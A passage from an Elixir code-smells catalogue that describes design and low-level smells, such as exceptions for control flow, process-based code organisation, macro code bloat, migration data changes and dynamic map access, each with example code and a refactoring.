end
def drive(%User{name: name, age: age}) when age < 18 do
"#{name} cannot drive"
end
```
While the example is small and looks like a clear code, try to imagine a situation where ``drive/1`` was more complex, having many more clauses, arguments, and extractions. This is the really smelly code!
* __Refactoring:__ As shown below, a possible solution to this smell is to extract only pattern/guard related variables in the signature once you have many arguments or multiple clauses:
```elixir
def drive(%User{age: age} = user) when age >= 18 do
%User{name: name} = user
"#{name} can drive"
end
def drive(%User{age: age} = user) when age < 18 do
%User{name: name} = user
"#{name} cannot drive"
end
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Using exceptions for control-flow
* __Category:__ Design-related smell.
* __Note:__ Formerly known as "Exceptions for control-flow".
* __Problem:__ This smell refers to code that forces developers to handle exceptions for control-flow. Exception handling itself does not represent a code smell, but this should not be the only alternative available to developers to handle an error in client code. When developers have no freedom to decide if an error is exceptional or not, this is considered a code smell.
* __Example:__ An example of this code smell, as shown below, is when a library (e.g. ``MyModule``) forces its clients to use ``try .. rescue`` statements to capture and evaluate errors. This library does not allow developers to decide if an error is exceptional or not in their applications.
```elixir
defmodule MyModule do
def janky_function(value) do
if is_integer(value) do
#...
"Result..."
else
raise RuntimeError, message: "invalid argument. Is not integer!"
end
end
end
```
```elixir
defmodule Client do
# Client forced to use exceptions for control-flow.
def foo(arg) do
try do
value = MyModule.janky_function(arg)
"All good! #{value}."
rescue
e in RuntimeError ->
reason = e.message
"Uh oh! #{reason}."
end
end
end
#...Use examples...
iex(1)> Client.foo(1)
"All good! Result...."
iex(2)> Client.foo("lucas")
"Uh oh! invalid argument. Is not integer!."
```
* __Refactoring:__ Library authors should guarantee that clients are not required to use exceptions for control-flow in their applications. As shown below, this can be done by refactoring the library ``MyModule``, providing two versions of the function that forces clients to use exceptions for control-flow (e.g., ``janky_function``). 1) a version with the raised exceptions should have the same name as the smelly one, but with a trailing ``!`` (i.e., ``janky_function!``); 2) Another version, without raised exceptions, should have a name identical to the original version (i.e., ``janky_function``), and should return the result wrapped in a tuple.
```elixir
defmodule MyModule do
@moduledoc """
Refactored library
"""
@doc """
Refactored version without exceptions for control-flow.
"""
def janky_function(value) do
if is_integer(value) do
#...
{:ok, "Result..."}
else
{:error, "invalid argument. Is not integer!"}
end
end
def janky_function!(value) do
case janky_function(value) do
{:ok, result} ->
result
{:error, message} ->
raise RuntimeError, message: message
end
end
end
```
This refactoring gives clients more freedom to decide how to proceed in the event of errors, defining what is exceptional or not in different situations. As shown next, when an error is not exceptional, clients can use specific control-flow structures, such as the ``case`` statement along with pattern matching.
```elixir
defmodule Client do
# Clients now can also choose to use control-flow structures
# for control-flow when an error is not exceptional.
def foo(arg) do
case MyModule.janky_function(arg) do
{:ok, value} -> "All good! #{value}."
{:error, reason} -> "Uh oh! #{reason}."
end
end
end
#...Use examples...
iex(1)> Client.foo(1)
"All good! Result...."
iex(2)> Client.foo("lucas")
"Uh oh! invalid argument. Is not integer!."
```
This example is based on code written by Tim Austin <sup>[neenjaw][neenjaw]</sup> and Angelika Tyborska <sup>[angelikatyborska][angelikatyborska]</sup>. Source: [link][ExceptionsForControlFlowExamples]
[▲ back to Index](#table-of-contents)
___
### Untested polymorphic behaviors
* __Category:__ Design-related smell.
* __Problem:__ This code smell refers to functions that have protocol-dependent parameters and are therefore polymorphic. A polymorphic function itself does not represent a code smell, but some developers implement these generic functions without accompanying guard clauses, allowing to pass parameters that do not implement the required protocol or that have no meaning.
* __Example:__ An instance of this code smell happens when a function uses ``to_string()`` to convert data received by parameter. The function ``to_string()`` uses the protocol ``String.Chars`` for conversions. Many Elixir data types (e.g., ``BitString``, ``Integer``, ``Float``, ``URI``) implement this protocol. However, as shown below, other Elixir data types (e.g., ``Map``) do not implement it and can cause an error in ``dasherize/1`` function. Depending on the situation, this behavior can be desired or not. Besides that, it may not make sense to dasherize a ``URI`` or a number as shown next.
```elixir
defmodule CodeSmells do
def dasherize(data) do
to_string(data)
|> String.replace("_", "-")
end
end
#...Use examples...
iex(1)> CodeSmells.dasherize("Lucas_Vegi")
"Lucas-Vegi"
iex(2)> CodeSmells.dasherize(10) #<= Makes sense?
"10"
iex(3)> CodeSmells.dasherize(URI.parse("http://www.code_smells.com")) #<= Makes sense?
"http://www.code-smells.com"
iex(4)> CodeSmells.dasherize(%{last_name: "vegi", first_name: "lucas"})
** (Protocol.UndefinedError) protocol String.Chars not implemented
for %{first_name: "lucas", last_name: "vegi"} of type Map
```
* __Refactoring:__ There are two main alternatives to improve code affected by this smell. __1)__ You can either remove the protocol use (i.e., ``to_string/1``), by adding multi-clauses on ``dasherize/1`` or just remove it; or __2)__ You can document that ``dasherize/1`` uses the protocol ``String.Chars`` for conversions, showing its consequences. As shown next, we refactored using the first alternative, removing the protocol and restricting ``dasherize/1`` parameter only to desired data types (i.e., ``BitString`` and ``Atom``). Besides that, we use ``@doc`` to validate ``dasherize/1`` for desired inputs and to document the behavior to some types that we think don't make sense for the function (e.g., ``Integer`` and ``URI``).
```elixir
defmodule CodeSmells do
@doc """
Function that converts underscores to dashes.
## Parameter
data: only BitString and Atom are supported.
## Examples
iex> CodeSmells.dasherize(:lucas_vegi)
"lucas-vegi"
iex> CodeSmells.dasherize("Lucas_Vegi")
"Lucas-Vegi"
iex> CodeSmells.dasherize(%{last_name: "vegi", first_name: "lucas"})
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
iex> CodeSmells.dasherize(URI.parse("http://www.code_smells.com"))
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
iex> CodeSmells.dasherize(10)
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
"""
def dasherize(data) when is_atom(data) do
dasherize(Atom.to_string(data))
end
def dasherize(data) when is_binary(data) do
String.replace(data, "_", "-")
end
end
#...Use examples...
iex(1)> CodeSmells.dasherize(:lucas_vegi)
"lucas-vegi"
iex(2)> CodeSmells.dasherize("Lucas_Vegi")
"Lucas-Vegi"
iex(3)> CodeSmells.dasherize(10)
** (FunctionClauseError) no function clause matching in CodeSmells.dasherize/1
```
This example is based on code written by José Valim ([@josevalim][jose-valim]). Source: [link][JoseValimExamples]
[▲ back to Index](#table-of-contents)
___
### Code organization by process
* __Category:__ Design-related smell.
* __Problem:__ This smell refers to code that is unnecessarily organized by processes. A process itself does not represent a code smell, but it should only be used to model runtime properties (e.g., concurrency, access to shared resources, event scheduling). When a process is used for code organization, it can create bottlenecks in the system.
* __Example:__ An example of this code smell, as shown below, is a library that implements arithmetic operations (e.g., add, subtract) by means of a ``GenSever`` process<sup>[link][GenServer]</sup>. If the number of calls to this single process grows, this code organization can compromise the system performance, therefore becoming a bottleneck.
```elixir
defmodule Calculator do
use GenServer
@moduledoc """
Calculator that performs two basic arithmetic operations.
This code is unnecessarily organized by a GenServer process.
"""
@doc """
Function to perform the sum of two values.
"""
def add(a, b, pid) do
GenServer.call(pid, {:add, a, b})
end
@doc """
Function to perform subtraction of two values.
"""
def subtract(a, b, pid) do
GenServer.call(pid, {:subtract, a, b})
end
def init(init_arg) do
{:ok, init_arg}
end
def handle_call({:add, a, b}, _from, state) do
{:reply, a + b, state}
end
def handle_call({:subtract, a, b}, _from, state) do
{:reply, a - b, state}
end
end
# Start a generic server process
iex(1)> {:ok, pid} = GenServer.start_link(Calculator, :init)
{:ok, #PID<0.132.0>}
#...Use examples...
iex(2)> Calculator.add(1, 5, pid)
6
iex(3)> Calculator.subtract(2, 3, pid)
-1
```
* __Refactoring:__ In Elixir, as shown next, code organization must be done only by modules and functions. Whenever possible, a library should not impose specific behavior (such as parallelization) on its clients. It is better to delegate this behavioral decision to the developers of clients, thus increasing the potential for code reuse of a library.
```elixir
defmodule Calculator do
def add(a, b) do
a + b
end
def subtract(a, b) do
a - b
end
end
#...Use examples...
iex(1)> Calculator.add(1, 5)
6
iex(2)> Calculator.subtract(2, 3)
-1
```
This example is based on code provided in Elixir's official documentation. Source: [link][CodeOrganizationByProcessExample]
[▲ back to Index](#table-of-contents)
___
### Large code generation by macros
* __Category:__ Design-related smell.
* __Note:__ This smell was suggested by the community via issues ([#13][Large-code-generation-issue]).
* __Problem:__ This code smell is related to ``macros`` that generate too much code. When a ``macro`` provides a large code generation, it impacts how the compiler or the runtime works. The reason for this is that Elixir may have to expand, compile, and execute a code multiple times, which will make compilation slower.
* __Example:__ The code shown below is an example of this smell. Imagine you are defining a router for a web application, where you could have macros like ``get/2``. On every invocation of the macro, which can be hundreds, the code inside ``get/2`` will be expanded and compiled, which can generate a large volume of code in total.
```elixir
defmodule Routes do
...
defmacro get(route, handler) do
quote do
route = unquote(route)
handler = unquote(handler)
if not is_binary(route) do
raise ArgumentError, "route must be a binary"
end
if not is_atom(handler) do
raise ArgumentError, "route must be a module"
end
@store_route_for_compilation {route, handler}
end
end
end
```
* __Refactoring:__ To remove this code smell, the developer must simplify the ``macro``, delegating to other functions part of its work. As shown below, by encapsulating in the function ``__define__/3`` the functionality pre-existing inside the ``quote``, we reduce the code that is expanded and compiled on every invocation of the ``macro``, and instead we dispatch to a function to do the bulk of the work.
```elixir
defmodule Routes do
...
defmacro get(route, handler) do
quote do
Routes.__define__(__MODULE__, unquote(route), unquote(handler))
end
end
def __define__(module, route, handler) do
if not is_binary(route) do
raise ArgumentError, "route must be a binary"
end
if not is_atom(handler) do
raise ArgumentError, "route must be a module"
end
Module.put_attribute(module, :store_route_for_compilation, {route, handler})
end
end
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Data manipulation by migration
* __Category:__ Design-related smell.
* __Problem:__ This code smell refers to modules that perform both data and structural changes in a database schema via ``Ecto.Migration``<sup>[link][Migration]</sup>. Migrations must be used exclusively to modify a database schema over time (e.g., by including or excluding columns and tables). When this responsibility is mixed with data manipulation code, the module becomes less cohesive, more difficult to test, and therefore more prone to bugs.
* __Example:__ An example of this code smell is when an ``Ecto.Migration`` is used simultaneously to alter a table, adding a new column to it, and also to update all pre-existing data in that table, assigning a value to this new column. As shown below, in addition to adding the ``is_custom_shop`` column in the ``guitars`` table, this ``Ecto.Migration`` changes the value of this column for some specific guitar models.
```elixir
defmodule GuitarStore.Repo.Migrations.AddIsCustomShopToGuitars do
use Ecto.Migration
import Ecto.Query
alias GuitarStore.Inventory.Guitar
alias GuitarStore.Repo
@doc """
A function that modifies the structure of table "guitars",
adding column "is_custom_shop" to it. By default, all data
pre-stored in this table will have the value false stored
in this new column.
Also, this function updates the "is_custom_shop" column value
of some guitar models to true.
"""
def change do
alter table("guitars") do
add :is_custom_shop, :boolean, default: false
end
create index("guitars", ["is_custom_shop"])
custom_shop_entries()
|> Enum.map(&update_guitars/1)
end
@doc """
A function that updates values of column "is_custom_shop" to true.
"""
defp update_guitars({make, model, year}) do
from(g in Guitar,
where: g.make == ^make and g.model == ^model and g.year == ^year,
select: g
)
|> Repo.update_all(set: [is_custom_shop: true])
end
@doc """
Function that defines which guitar models that need to have the values
of the "is_custom_shop" column updated to true.
"""
defp custom_shop_entries() do
[
{"Gibson", "SG", 1999},
{"Fender", "Telecaster", 2020}
]
end
end
```
You can run this smelly migration above by going to the root of your project and typing the next command via console:
```elixir
mix ecto.migrate
```
* __Refactoring:__ To remove this code smell, it is necessary to separate the data manipulation in a ``mix task`` <sup>[link][MixTask]</sup> different from the module that performs the structural changes in the database via ``Ecto.Migration``. This separation of responsibilities is a best practice for increasing code testability. As shown below, the module ``AddIsCustomShopToGuitars`` now use ``Ecto.Migration`` only to perform structural changes in the database schema:
```elixir
defmodule GuitarStore.Repo.Migrations.AddIsCustomShopToGuitars do
use Ecto.Migration
@doc """
A function that modifies the structure of table "guitars",
adding column "is_custom_shop" to it. By default, all data
pre-stored in this table will have the value false stored
in this new column.
"""
def change do
alter table("guitars") do
add :is_custom_shop, :boolean, default: false
end
create index("guitars", ["is_custom_shop"])
end
end
```
Furthermore, the new mix task ``PopulateIsCustomShop``, shown next, has only the responsibility to perform data manipulation, thus improving testability:
```elixir
defmodule Mix.Tasks.PopulateIsCustomShop do
@shortdoc "Populates is_custom_shop column"
use Mix.Task
import Ecto.Query
alias GuitarStore.Inventory.Guitar
alias GuitarStore.Repo
@requirements ["app.start"]
def run(_) do
custom_shop_entries()
|> Enum.map(&update_guitars/1)
end
defp update_guitars({make, model, year}) do
from(g in Guitar,
where: g.make == ^make and g.model == ^model and g.year == ^year,
select: g
)
|> Repo.update_all(set: [is_custom_shop: true])
end
defp custom_shop_entries() do
[
{"Gibson", "SG", 1999},
{"Fender", "Telecaster", 2020}
]
end
end
```
You can run this ``mix task`` above by typing the next command via console:
```elixir
mix populate_is_custom_shop
```
This example is based on code originally written by Carlos Souza. Source: [link][DataManipulationByMigrationExamples]
[▲ back to Index](#table-of-contents)
___
### Using App Configuration for libraries
* __Category:__ Design-related smells.
* __Note:__ Formerly known as "App configuration for code libs".
* __Problem:__ The ``Application Environment`` <sup>[link][ApplicationEnvironment]</sup> is a mechanism that can be used to parameterize values that will be used in several different places in a system implemented in Elixir. This parameterization mechanism can be very useful and therefore is not considered a code smell by itself. However, when ``Application Environments`` are used as a mechanism for configuring a library's functions, this can make these functions less flexible, making it impossible for a library-dependent application to reuse its functions with different behaviors in different places in the code. Libraries are created to foster code reuse, so this limitation imposed by this parameterization mechanism can be problematic in this scenario.
* __Example:__ The ``DashSplitter`` module represents a library that configures the behavior of its functions through the global ``Application Environment`` mechanism. These configurations are concentrated in the ``config/config.exs`` file, shown below:
```elixir
import Config
config :app_config,
parts: 3
import_config "#{config_env()}.exs"
```
One of the functions implemented by the ``DashSplitter`` library is ``split/1``. This function has the purpose of separating a string received via parameter into a certain number of parts. The character used as a separator in ``split/1`` is always ``"-"`` and the number of parts the string is split into is defined globally by the ``Application Environment``. This value is retrieved by the ``split/1`` function by calling ``Application.fetch_env!/2``, as shown next:
```elixir
defmodule DashSplitter do
def split(string) when is_binary(string) do
parts = Application.fetch_env!(:app_config, :parts) # <= retrieve parameterized value
String.split(string, "-", parts: parts) # <= parts: 3
end
end
```
Due to this type of parameterized value used by the ``DashSplitter`` library, all applications dependent on it can only use the ``split/1`` function with identical behavior in relation to the number of parts generated by string separation. Currently, this value is equal to 3, as we can see in the use examples shown below:
```elixir
iex(1)> DashSplitter.split("Lucas-Francisco-Vegi")
["Lucas", "Francisco", "Vegi"]
iex(2)> DashSplitter.split("Lucas-Francisco-da-Matta-Vegi")
["Lucas", "Francisco", "da-Matta-Vegi"]
```
* __Refactoring:__ To remove this code smell and make the library more adaptable and flexible, this type of configuration must be performed via parameters in function calls. The code shown below performs the refactoring of the ``split/1`` function by adding a new optional parameter of type ``Keyword list``. With this new parameter it is possible to modify the default behavior of the function at the time of its call, allowing multiple different ways of using ``split/2`` within the same application:
```elixir
defmodule DashSplitter do
def split(string, opts \\ []) when is_binary(string) and is_list(opts) do
parts = Keyword.get(opts, :parts, 2) # <= default config of parts == 2
String.split(string, "-", parts: parts)
end
end
#...Use examples...
iex(1)> DashSplitter.split("Lucas-Francisco-da-Matta-Vegi", [parts: 5])
["Lucas", "Francisco", "da", "Matta", "Vegi"]
iex(2)> DashSplitter.split("Lucas-Francisco-da-Matta-Vegi") #<= default config is used!
["Lucas", "Francisco-da-Matta-Vegi"]
```
These examples are based on code provided in Elixir's official documentation. Source: [link][AppConfigurationForCodeLibsExample]
[▲ back to Index](#table-of-contents)
___
### Compile-time global configuration
* __Category:__ Design-related smells.
* __Note:__ Formerly known as "Compile-time app configuration".
* __Problem:__ As explained in the description of [Using App Configuration for libraries](#using-app-configuration-for-libraries), the ``Application Environment`` can be used to parameterize values in an Elixir system. Although it is not a good practice to use this mechanism in the implementation of libraries, sometimes this can be unavoidable. If these parameterized values are assigned to ``module attributes``, it can be especially problematic. As ``module attribute`` values are defined at compile-time, when trying to assign ``Application Environment`` values to these attributes, warnings or errors can be triggered by Elixir. This happens because, when defining module attributes at compile time, the ``Application Environment`` is not yet available in memory.
* __Example:__ The ``DashSplitter`` module represents a library. This module has an attribute ``@parts`` that has its constant value defined at compile-time by calling ``Application.fetch_env!/2``. The ``split/1`` function, implemented by this library, has the purpose of separating a string received via parameter into a certain number of parts. The character used as a separator in ``split/1`` is always ``"-"`` and the number of parts the string is split into is defined by the module attribute ``@parts``, as shown next:
```elixir
defmodule DashSplitter do
@parts Application.fetch_env!(:app_config, :parts) # <= define module attribute
# at compile-time
def split(string) when is_binary(string) do
String.split(string, "-", parts: @parts) #<= reading from a module attribute
end
end
```
Due to this compile-time configuration based on the ``Application Environment`` mechanism, Elixir can raise warnings or errors, as shown next, during compilation:
```elixir
warning: Application.fetch_env!/2 is discouraged in the module body,
use Application.compile_env/3 instead...
** (ArgumentError) could not fetch application environment :parts
for application :app_config because the application was not loaded nor
configured
```
* __Refactoring:__ To remove this code smell, when it is really unavoidable to use the ``Application Environment`` mechanism to configure library functions, this should be done at runtime and not during compilation. That is, instead of calling ``Application.fetch_env!(:app_config, :parts)`` at compile-time to set ``@parts``, this function must be called at runtime within ``split/1``. This will mitigate the risk that ``Application Environment`` is not yet available in memory when it is necessary to use it. Another possible refactoring, as shown below, is to replace the use of the ``Application.fetch_env!/2`` function to define ``@parts``, with the ``Application.compile_env/3``. The third parameter of ``Application.compile_env/3`` defines a default value that is returned whenever that ``Application Environment`` is not available in memory during the definition of ``@parts``. This prevents Elixir from raising an error at compile-time:
```elixir
defmodule DashSplitter do
@parts Application.compile_env(:app_config, :parts, 3) # <= default value 3 prevents an error!
def split(string) when is_binary(string) do
String.split(string, "-", parts: @parts) #<= reading from a module attribute
end
end
```
These examples are based on code provided in Elixir's official documentation. Source: [link][AppConfigurationForCodeLibsExample]
* __Remark:__ This code smell can be detected by [Credo][Credo], a static code analysis tool. During its checks, Credo raises this [warning][CredoWarningApplicationConfigInModuleAttribute] when this smell is found.
[▲ back to Index](#table-of-contents)
___
### "Use" instead of "import"
* __Category:__ Design-related smells.
* __Note:__ Formerly known as "Dependency with "use" when an "import" is enough".
* __Problem:__ Elixir has mechanisms such as ``import``, ``alias``, and ``use`` to establish dependencies between modules. Establishing dependencies allows a module to call functions from other modules, facilitating code reuse. A code implemented with these mechanisms does not characterize a smell by itself; however, while the ``import`` and ``alias`` directives have lexical scope and only facilitate that a module to use functions of another, the ``use`` directive has a broader scope, something that can be problematic. The ``use`` directive allows a module to inject any type of code into another, including propagating dependencies. In this way, using the ``use`` directive makes code readability worse, because to understand exactly what will happen when it references a module, it is necessary to have knowledge of the internal details of the referenced module.
* __Example:__ The code shown below is an example of this smell. Three different modules were defined -- ``ModuleA``, ``Library``, and ``ClientApp``. ``ClientApp`` is reusing code from the ``Library`` via the ``use`` directive, but is unaware of its internal details. Therefore, when ``Library`` is referenced by ``ClientApp``, it injects into ``ClientApp`` all the content present in its ``__using__/1`` macro. Due to the decreased readability of the code and the lack of knowledge of the internal details of the ``Library``, ``ClientApp`` defines a local function ``foo/0``. This will generate a conflict as ``ModuleA`` also has a function ``foo/0``; when ``ClientApp`` referenced ``Library`` via the ``use`` directive, it has a dependency for ``ModuleA`` propagated to itself:
```elixir
defmodule ModuleA do
def foo do
"From Module A"
end
end
```
```elixir
defmodule Library do
defmacro __using__(_opts) do
quote do
import ModuleA # <= propagating dependencies!
def from_lib do
"From Library"
end
end
end
def from_lib do
"From Library"
end
end
```
```elixir
defmodule ClientApp do
use Library
def foo do
"Local function from client app"
end
def from_client_app do
from_lib() <> " - " <> foo()
end
end
```
When we try to compile ``ClientApp``, Elixir will detect the conflict and throw the following error:
```elixir
iex(1)> c("client_app.ex")
** (CompileError) client_app.ex:4: imported ModuleA.foo/0 conflicts with local function
```
* __Refactoring:__ To remove this code smell, it may be possible to replace ``use`` with ``alias`` or ``import`` when creating a dependency between an application and a library. This will make code behavior clearer, due to improved readability. In the following code, ``ClientApp`` was refactored in this way, and with that, the conflict as previously shown no longer exists:
```elixir
defmodule ClientApp do
import Library
def foo do
"Local function from client app"
end
def from_client_app do
from_lib() <> " - " <> foo()
end
end
#...Uses example...
iex(1)> ClientApp.from_client_app()
"From Library - Local function from client app"
```
These examples are based on code provided in Elixir's official documentation. Source: [link][DependencyWithUseExample]
[▲ back to Index](#table-of-contents)
## Low-level concerns smells
Low-level concerns smells are more simple than design-related smells and affect a small part of the code. Next, all 9 different smells classified as low-level concerns are explained and exemplified:
### Working with invalid data
* __Category:__ Low-level concerns smells.
* __Problem:__ This code smell refers to a function that does not validate its parameters' types and therefore can produce internal non-predicted behavior. When an error is raised inside a function due to an invalid parameter value, this can confuse the developers and make it harder to locate and fix the error.
* __Example:__ An example of this code smell is when a function receives an invalid parameter and then passes it to a function from a third-party library. This will cause an error (raised deep inside the library function), which may be confusing for the developer who is working with invalid data. As shown next, the function ``foo/1`` is a client of a third-party library and doesn't validate its parameters at the boundary. In this way, it is possible that invalid data will be passed from ``foo/1`` to the library, causing a mysterious error.
```elixir
defmodule MyApp do
alias ThirdPartyLibrary, as: Library
def foo(invalid_data) do
#...some code...
Library.sum(1, invalid_data)
#...some code...
end
end
#...Use examples...
# with valid data is ok
iex(1)> MyApp.foo(2)
3
#with invalid data cause a confusing error deep inside
iex(2)> MyApp.foo("Lucas")
** (ArithmeticError) bad argument in arithmetic expression: 1 + "Lucas"
:erlang.+(1, "Lucas")
library.ex:3: ThirdPartyLibrary.sum/2
```
* __Refactoring:__ To remove this code smell, client code must validate input parameters at the boundary with the user, via guard clauses or pattern matching. This will prevent errors from occurring deeply, making them easier to understand. This refactoring will also allow libraries to be implemented without worrying about creating internal protection mechanisms. The next code illustrates the refactoring of ``foo/1``, removing this smell:
```elixir
defmodule MyApp do
alias ThirdPartyLibrary, as: Library
def foo(data) when is_integer(data) do
#...some code...
Library.sum(1, data)
#...some code...
end
end
#...Use examples...
#with valid data is ok
iex(1)> MyApp.foo(2)
3
# with invalid data errors are easy to locate and fix
iex(2)> MyApp.foo("Lucas")
** (FunctionClauseError) no function clause matching in MyApp.foo/1
The following arguments were given to MyApp.foo/1:
# 1
"Lucas"
my_app.ex:6: MyApp.foo/1
```
This example is based on code provided in Elixir's official documentation. Source: [link][WorkingWithInvalidDataExample]
[▲ back to Index](#table-of-contents)
___
### Complex branching
* __Category:__ Low-level concerns smell.
* __Note:__ Formerly known as "Complex API error handling".
* __Problem:__ When a function assumes the responsibility of handling multiple errors alone, it can increase its cyclomatic complexity (metric of control-flow) and become incomprehensible. This situation can configure a specific instance of "Long function", a traditional code smell, but has implications of its own. Under these circumstances, this function could get very confusing, difficult to maintain and test, and therefore bug-proneness.
* __Example:__ An example of this code smell is when a function uses the ``case`` control-flow structure or other similar constructs (e.g., ``cond``, or ``receive``) to handle multiple variations of response types returned by the same API endpoint. This practice can make the function more complex, long, and difficult to understand, as shown next.
```elixir
def get_customer(customer_id) do
case get("/customers/#{customer_id}") do
{:ok, %Tesla.Env{status: 200, body: body}} -> {:ok, body}
{:ok, %Tesla.Env{body: body}} -> {:error, body}
{:error, _} = other -> other
end
end
```
Although ``get_customer/1`` is not really long in this example, it could be. Thinking about this more complex scenario, where a large number of different responses can be provided to the same endpoint, is not a good idea to concentrate all on a single function. This is a risky scenario, where a little typo, or any problem introduced by the programmer in handling a response type, could eventually compromise the handling of all responses from the endpoint (if the function raises an exception, for example).
* __Refactoring:__ As shown below, in this situation, instead of concentrating all handlings within the same function, creating a complex branching, it is better to delegate each branch (handling of a response type) to a different private function. In this way, the code will be cleaner, more concise, and readable.
```elixir
def get_customer(customer_id) when is_integer(customer_id) do
case get("/customers/#{customer_id}") do
{:ok, %Tesla.Env{status: 200, body: body}} -> success_api_response(body)
{:ok, %Tesla.Env{body: body}} -> x_error_api_response(body)
{:error, _} = other -> y_error_api_response(other)
end
end
defp success_api_response(body) do
{:ok, body}
end
defp x_error_api_response(body) do
{:error, body}
end
defp y_error_api_response(other) do
other
end
```
While this example of refactoring ``get_customer/1`` might seem quite more verbose than the original code, remember to imagine a scenario where ``get_customer/1`` is responsible for handling a number much larger than three different types of possible responses. This is the smelly scenario!
This example is based on code written by Zack <sup>[MrDoops][MrDoops]</sup> and Dimitar Panayotov <sup>[dimitarvp][dimitarvp]</sup>. Source: [link][ComplexErrorHandleExample]. We got suggestions from José Valim ([@josevalim][jose-valim]) on the refactoring.
[▲ back to Index](#table-of-contents)
___
### Complex else clauses in with
* __Category:__ Low-level concerns smell.
* __Note:__ This smell was suggested by the community via issues ([#7][Complex-else-clauses-in-with-issue]).
* __Problem:__ This code smell refers to ``with`` statements that flatten all its error clauses into a single complex ``else`` block. This situation is harmful to the code readability and maintainability because difficult to know from which clause the error value came.
* __Example:__ An example of this code smell, as shown below, is a function ``open_decoded_file/1`` that read a base 64 encoded string content from a file and returns a decoded binary string. This function uses a ``with`` statement that needs to handle two possible errors, all of which are concentrated in a single complex ``else`` block.
```elixir
def open_decoded_file(path) do
with {:ok, encoded} <- File.read(path),
{:ok, value} <- Base.decode64(encoded) do
value
else
{:error, _} -> :badfile
:error -> :badencoding
end
end
```
* __Refactoring:__ As shown below, in this situation, instead of concentrating all error handlings within a single complex ``else`` block, it is better to normalize the return types in specific private functions. In this way, due to its organization, the code will be cleaner and more readable.
```elixir
def open_decoded_file(path) do
with {:ok, encoded} <- file_read(path),
{:ok, value} <- base_decode64(encoded) do
value
end
end
defp file_read(path) do
case File.read(path) do
{:ok, contents} -> {:ok, contents}
{:error, _} -> :badfile
end
end
defp base_decode64(contents) do
case Base.decode64(contents) do
{:ok, contents} -> {:ok, contents}
:error -> :badencoding
end
end
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Alternative return types
* __Category:__ Low-level concerns smell.
* __Note:__ This smell was suggested by the community via issues ([#6][Alternative-return-type-issue]).
* __Problem:__ This code smell refers to functions that receive options (e.g., ``keyword list``) parameters that drastically change its return type. Because options are optional and sometimes set dynamically, if they change the return type it may be hard to understand what the function actually returns.
* __Example:__ An example of this code smell, as shown below, is when a library (e.g. ``AlternativeInteger``) has a multi-clause function ``parse/2`` with many alternative return types. Depending on the options received as a parameter, the function will have a different return type.
```elixir
defmodule AlternativeInteger do
def parse(string, opts) when is_list(opts) do
case opts[:discard_rest] do
true -> #only an integer value convert from string parameter
_ -> #another return type (e.g., tuple)
end
end
def parse(string, opts \\ :default) do
#another return type (e.g., tuple)
end
end
#...Use examples...
iex(1)> AlternativeInteger.parse("13")
{13, "..."}
iex(2)> AlternativeInteger.parse("13", discard_rest: true)
13
iex(3)> AlternativeInteger.parse("13", discard_rest: false)
{13, "..."}
```
* __Refactoring:__ To refactor this smell, as shown next, it's better to add in the library a specific function for each return type (e.g., ``parse_no_rest/1``), no longer delegating this to an options parameter.
```elixir
defmodule AlternativeInteger do
def parse_no_rest(string) do
#only an integer value convert from string parameter
end
def parse(string) do
#another return type (e.g., tuple)
end
end
#...Use examples...
iex(1)> AlternativeInteger.parse("13")
{13, "..."}
iex(2)> AlternativeInteger.parse_no_rest("13")
13
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Accessing non-existent Map/Struct fields
* __Category:__ Low-level concerns smells.
* __Note:__ Formerly known as "Map/struct dynamic access".
* __Problem:__ In Elixir, it is possible to access values from ``Maps``, which are key-value data structures, either strictly or dynamically. When trying to dynamically access the value of a key from a ``Map``, if the informed key does not exist, a null value (``nil``) will be returned. This return can be confusing and does not allow developers to conclude whether the key is non-existent in the ``Map`` or just has no bound value. In this way, this code smell may cause bugs in the code.
* __Example:__ The code shown below is an example of this smell. The function ``plot/1`` tries to draw a graphic to represent the position of a point in a cartesian plane. This function receives a parameter of ``Map`` type with the point attributes, which can be a point of a 2D or 3D cartesian coordinate system. To decide if a point is 2D or 3D, this function uses dynamic access to retrieve values of the ``Map`` keys:
```elixir
defmodule Graphics do
def plot(point) do
#...some code...
# Dynamic access to use point values
{point[:x], point[:y], point[:z]}
#...some code...
end
end
#...Use examples...
iex(1)> point_2d = %{x: 2, y: 3}
%{x: 2, y: 3}
iex(2)> point_3d = %{x: 5, y: 6, z: nil}
%{x: 5, y: 6, z: nil}
iex(3)> Graphics.plot(point_2d)
{2, 3, nil} # <= ambiguous return
iex(4)> Graphics.plot(point_3d)
{5, 6, nil}
```
As can be seen in the example above, even when the key ``:z`` does not exist in the ``Map`` (``point_2d``), dynamic access returns the value ``nil``. This return can be dangerous because of its ambiguity. It is not possible to conclude from it whether the ``Map`` has the key ``:z`` or not. If the function relies on the return value to make decisions about how to plot a point, this can be problematic and even cause errors when testing the code.
* __Refactoring:__ To remove this code smell, whenever a ``Map`` has keys of ``Atom`` type, replace the dynamic access to its values per strict access. When a non-existent key is strictly accessed, Elixir raises an error immediately, allowing developers to find bugs faster. The next code illustrates the refactoring of ``plot/1``, removing this smell:
```elixir
defmodule Graphics do
def plot(point) do
#...some code...
# Strict access to use point values
{point.x, point.y, point.z}
#...some code...
end
end
#...Use examples...
iex(1)> point_2d = %{x: 2, y: 3}
%{x: 2, y: 3}
iex(2)> point_3d = %{x: 5, y: 6, z: nil}
%{x: 5, y: 6, z: nil}
iex(3)> Graphics.plot(point_2d)
** (KeyError) key :z not found in: %{x: 2, y: 3} # <= explicitly warns that
graphic.ex:6: Graphics.plot/1 # <= the z key does not exist!
iex(4)> Graphics.plot(point_3d)
{5, 6, nil}
```
As shown below, another alternative to refactor this smell is to replace a ``Map`` with a ``struct`` (named map). By default, structs only support strict access to values. In this way, accesses will always return clear and objective results:
```elixir
defmodule Point do
@enforce_keys [:x, :y]
defstruct [x: nil, y: nil]
end
#...Use examples...
iex(1)> point = %Point{x: 2, y: 3}
%Point{x: 2, y: 3}
iex(2)> point.x # <= strict access to use point values
2
iex(3)> point.z # <= trying to access a non-existent key
